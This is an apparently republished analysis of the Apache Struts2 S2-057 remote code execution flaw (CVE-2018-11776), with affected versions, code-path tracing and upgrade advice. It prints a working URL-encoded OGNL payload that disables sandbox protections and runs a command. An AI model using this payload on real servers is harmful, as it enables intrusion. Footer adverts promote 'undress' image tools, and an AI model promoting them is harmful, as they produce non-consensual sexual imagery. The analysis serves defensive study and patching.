Operation and Maintenance
Safety
How to perform Apache Struts2 S2-057 remote code execution vulnerability analysis
How to perform Apache Struts2 S2-057 remote code execution vulnerability analysis
Preface
The Apache Struts framework is an open source project based on the Web application framework of Java Servlets, JavaBeans, and JavaServer Pages (JSP). Struts is based on the design of Model-View-Controller (MVC) Patterns can be used to build complex web applications. It allows us to decompose the code of an application's business logic, control logic and presentation logic, making it more reusable and maintainable. The Struts framework is part of the Jakarta project and is managed by the Apache Software Foundation.
Tianrongxin Alpha Lab will bring you Apache Struts2 S2-057 remote code execution vulnerability analysis~
1. Vulnerability description
When struts.mapper.alwaysSelectFullNamespace is set to true, and the namespace value of the package tab and the param tab of result is missing, or wildcards are used, the namespace can be controlled, and eventually the namespace will be brought into the OGNL statement for execution. This creates a remote code execution vulnerability.
1. Affected system versions
Apache Struts 2.3 - Struts 2.3.34
Apache Struts 2.5 - Struts 2.5.16
2. Vulnerability No.
CVE-2018-11776
2. Environment setup
1. Download: http://archive.apache.org/dist/struts/2.3.34/ struts-2.3.34-all.zip
2. Modify the configuration file struts-actionchaining.xml
This vulnerability has multiple attack vectors including:
Redirect action
Action chaining
Postback result
Take the first one as an example, modify the configuration file content as:
3. Vulnerability details
In the parseNameAndNamespace method of the DefaultActionMapper class.
When alwaysSelectFullNamespace is set to true, the value of namespace is obtained from the URL. The URL is controllable, so the namespace is also controllable.
After the Action is executed, the program will call the execute() method in the ServletActionRedirectResult class to parse the redirect Result.
First, when namespace is empty, call invocation.getProxy().getNamespace() to assign a value to the variable namespace, and then pass the variable namespace into the ActionMapping constructor.
Then, ActionMapper.getUriFromActionMapping() reorganizes the value after ActionMapping, generates a URL string (including namespace), and assigns it to the tmplocation variable.
Then the tmplocation with namespace is passed into the setLocation() method.
This method assigns the tmpLocation value to the location variable in the StrutsResultSupport class.
Then, trace the super.execute() method.
Continue to track super.execute() in the ServletActionResult class.
In the execute() method in the StrutsResultSupport class, the location variable (with namespace) that was just assigned is passed into the conditionalParse() method.
In the end, OGNL parsing of the namespace through TextParseUtil.translateVariables() resulted in a remote code execution vulnerability.
4. Vulnerability Exploitation
1. Access the address whose url is /${(111 111)}/actionChain1.action.
Access triggers the OGNL expression, the url changes to /222/register2.action, and the vulnerability exists.
2. Payload:
%24%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3d%23request%5b%27struts.valueStack%27%5d.context).(%23cr%3d%23ct%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ou%3d%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23cmd%3d%40java.lang.Runtime%40getRuntime().exec(%22calc%22))%7d
This payload is only applicable to the 2.3 series version.
5. Repair suggestions
1. Official patch
Currently, the official has released the latest version to fix this vulnerability. Affected users Please upgrade to Apache Struts 2.3.35 or Struts 2.5.17 version as soon as possible: https://struts.apache.org/download.cgi#struts2517.
2. Manual repair
Modify the configuration file:
Fix the namespace value of the package tag and the param tag of result, and prohibit the use of wildcards.
The above is the detailed content of How to perform Apache Struts2 S2-057 remote code execution vulnerability analysis. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
How to view Struts2 historical vulnerabilities from a protection perspective
May 13, 2023 pm 05:49 PM
1. Introduction The Struts2 vulnerability is a classic series of vulnerabilities. The root cause is that Struts2 introduces OGNL expressions to make the framework flexible and dynamic. With the patching of the overall framework improved, it will now be much more difficult to discover new Struts2 vulnerabilities than before. Judging from the actual situation, most users have already repaired historical high-risk vulnerabilities. Currently, when doing penetration testing, Struts2 vulnerabilities are mainly left to chance, or it will be more effective to attack unpatched systems after being exposed to the intranet. Online analysis articles mainly analyze these Struts2 vulnerabilities from the perspective of attack and exploitation. As the new H3C offense and defense team, part of our job is to maintain the rule base of ips products. Today we will review this system.
What is the principle of Struts2 framework
Jan 04, 2024 pm 01:55 PM
The principle of the Struts2 framework: 1. The interceptor parses the request path; 2. Finds the complete class name of the Action; 3. Creates the Action object; 4. Execute the Action method; 5. Returns the result; 6. View parsing. Its principle is based on the interceptor mechanism, which completely separates the business logic controller from the Servlet API, improving the reusability and maintainability of the code. By using the reflection mechanism, the Struts2 framework can flexibly create and manage Action objects to process requests and responses.
Struts2 vulnerability S2-001 example analysis
May 15, 2023 pm 03:58 PM
Vulhub vulnerability series: struts2 vulnerability S2-0011. Vulnerability description: struts2 vulnerability S2-001 is when the user submits form data and verification fails, the server uses OGNL expression to parse the parameter value previously submitted by the user, %{value} and refills the corresponding form data. For example, in a registration or login page. If the submission fails, the server will usually default to returning the previously submitted data. Since the server uses %{value} to perform OGNL expression parsing on the submitted data, the server can directly send the payload to execute the command. 2. Vulhub vulnerability exploitation: Using vulhub to reproduce vulnerabilities can save the environment construction process, which is very convenient. vu
How does the Struts2 S2-059 remote code execution vulnerability reproduce?
May 23, 2023 pm 10:37 PM
0x00 Introduction Struts2 is a very powerful JavaWeb open source framework launched by the Apache software organization, which is essentially equivalent to a servlet. Struts2 is based on MVC architecture and has a clear framework structure. It is usually used as a controller to establish data interaction between models and views, and is used to create enterprise-level Java web applications. It utilizes and extends the JavaServletAPI and encourages developers to adopt the MVC architecture. Struts2 takes the excellent design ideas of WebWork as the core, absorbs some advantages of the Struts framework, and provides a neater Web application framework implemented in the MVC design pattern. 0x01 vulnerability
Struts2-057 two versions of RCE vulnerability example analysis
May 15, 2023 pm 06:46 PM
Foreword On August 22, 2018, Apache Strust2 released the latest security bulletin. Apache Struts2 has a high-risk remote code execution vulnerability (S2-057/CVE-2018-11776). The vulnerability was discovered by ManYueMo, a security researcher from the SemmleSecurityResearch team. This vulnerability is due to the fact that when using the namespace function to define XML configuration in the Struts2 development framework, the namespace value is not set and is not set in the upper-layer action configuration (ActionConfiguration) or a wildcard namespace is used, which may lead to remote code execution. In the same way, u
How to reproduce the Apache Struts2--048 remote code execution vulnerability
May 12, 2023 pm 07:43 PM
0x00 Introduction The Struts2 framework is an open source web application architecture for developing JavaEE web applications. It utilizes and extends JavaServletAPI and encourages developers to adopt MVC architecture. Struts2 takes the excellent design ideas of WebWork as the core, absorbs some advantages of the Struts framework, and provides a neater Web application framework implemented in the MVC design pattern. Overview of the 0x01 vulnerability. The ApacheStruts22.3.x series has the struts2-struts1-plugin plug-in enabled and the struts2-showcase directory exists. The cause of the vulnerability is when ActionMe
Example analysis of Struts2 framework site risks
May 30, 2023 pm 12:32 PM
1. Overview Struts is an open source project sponsored by the Apache Software Foundation (ASF). It started as a sub-project within the Jakarta project and later became a top-level project of ASF. By using JavaServlet/JSP technology, it implements the application framework [WebFramework] based on the Model-View-Controller [MVC] design pattern of JavaEE Web applications. It is a classic product in the MVC classic design pattern. In the early days of the development of JavaEE web applications, in addition to using Servlet technology, HTM was generally used in the source code of JavaServerPages (JSP).
How to perform Apache Struts2 S2-057 remote code execution vulnerability analysis
May 15, 2023 pm 09:43 PM
Preface The Apache Struts framework is an open source project based on the Web application framework of JavaServlets, JavaBeans, and JavaServerPages (JSP). Struts is based on the Model-View-Controller (MVC) design pattern and can be used to build complex Web applications. It allows us to decompose the code of an application's business logic, control logic and presentation logic, making it more reusable and maintainable. The Struts framework is part of the Jakarta project and is managed by the Apache Software Foundation. Tianrongxin Alpha Lab will bring you ApacheStruts2S2-057
